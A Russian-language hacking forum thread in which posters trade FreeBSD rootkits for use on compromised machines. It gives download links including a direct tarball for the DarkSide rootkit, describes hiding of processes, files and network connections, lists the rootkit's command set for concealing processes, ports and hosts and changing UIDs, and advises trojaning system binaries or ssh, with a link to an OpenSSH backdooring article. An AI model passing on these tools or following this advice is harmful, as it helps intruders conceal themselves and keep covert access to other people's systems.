На здоровье... _hxxp://www.google.ru/search?hl=ru&q=FreeBSD+rootkit+&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
Да вот в том то и дело ,что поиск ничего и не дал, поэтому то я и запостил в форум , думал то ли мне не везет, то ли ищу не правильно , пока не прочитал ответ Desr0w.
2 Desr0w Да ! Вот только описываемы в вырезке руткиты я и нашел в инете и ничего более... Печально...
Окей спс за поправку. Вот сам руткит по ОС: freebsd(версия точно не знаю) Скачать Вот есть еще под FreeBSD rootkit precompiled binaries for 4.2-RELEASE Скачать
Один из посетителей 0x48k.cc под ником suspect поделился с нами информацией следующего характера: Ещё не разбирался, но из возможностей руткита стоит отметить: - сокрытие PID процесса и всех поражденных потомков - сокрытие файлов/каталогов, реализованное через модификацию данных inode, что позволяет сохранять скрытое состояние даже после перезагрузки системы/выгрузки руткита - сокрытие соединений - "пользовательский интерфейс" реализован через дополнительный syscall и т.д. стандартные функции. Пользуемся наздоровье, спасибо suspect за ссылку. Позже удалось выяснить что следует тщательно тестировать через ./necall, не делая make install. Стабильностью руткит не отличается, уходит в креш при сокрытии файла на FreeBSD 5.4, процессы скрывает некоторое время (~2 часа), потом также уходит в даун. И снова спасибо suspect'у. Я оттестировать не смог, т.к. спохмела загубил все разделы из Solaris(тестироват SinAR), включая FreeBSD 6.1 и Win XP. Так что звиняйте =) Позже теперь (жду когда придёт бесплатный CD с OpenSolaris =))
Меня тут спросили ещё по какие-нибудь руткиты для FreeBSD - рассказываю. От замечательной команды lbyte, которая, к сожалению, уже больше не существует, был такой релиз под названием DarkSide - RootKit для FreeBSD. О нём даже писали в каком-то из старых номеров журнала Хакер. Конечно, маловероятно, что он потянет под 5й и 6й веткой, но попытка не пытка, да и модификацию исходников ещё никто тоже не отменял. Скачать можно здесь: http://lbyte.void.ru/rel/files/darkside-0.2.3.tar.gz Лично тестировал на FreeBSD 4.6 где-то в 2003 году... Функционал стандартный: 1)сокрытие процессов и их потомков 2)сокрытие файлов и директорий 3)сокрытие сетевых соединений путём модификасии TCP/IP стека. Использование: Code: hideproc <pid> - скрыть процесс, имеющий PID= <pid> unhideproc <pid> - показать процесс с PID= <pid> printprocs - показать все скрытые процессы changeuid <pid> <uid> - изменить uid процесса с PID= <pid> на <uid> changeeuid <pid> <euid> - изменить euid процесса с PID= <pid> на <euid> changegid <pid> <gid> - изменить gid процесса с PID= <pid> на <gid> changeegid <pid> <egid>- изменить egid процесса с PID= <pid> на <egid> hidefile <name> - скрыть все файлы с именем <name> unhidefile <name> - показать все файлы с именем <name> printfiles - показать вс скрытые файлы hideport <num> - скрыть все соединения с портом <num> unhideport <num> - рыскрыть все соединения с портом <num> hidehost <ip> - скрыть все соединения с <ip> unhidehost <ip> - раскрыть все соединения <ip>
под шестую фряху (release 6) что -то руткит не робит, подскажите может что -то не так делаю, вообщем запустил скрипт setup, и прописал троя в конфиге /dev/fd/.99/.ttyf00 и /dev/fd/.99/.ttyp00
Скорее всего fbrk впринципе не заработает. Предлагаю затроянить системные бнарники или ssh, например. Хотя, надо быть аккуратнее ибо способы не супер и требуют особой аккуратности.
Free Читай: hellknights.void.ru/articles/0x48k-OpenSSH-backdooring.html От себя добавлю: forum.antichat.ru/thread62167.html
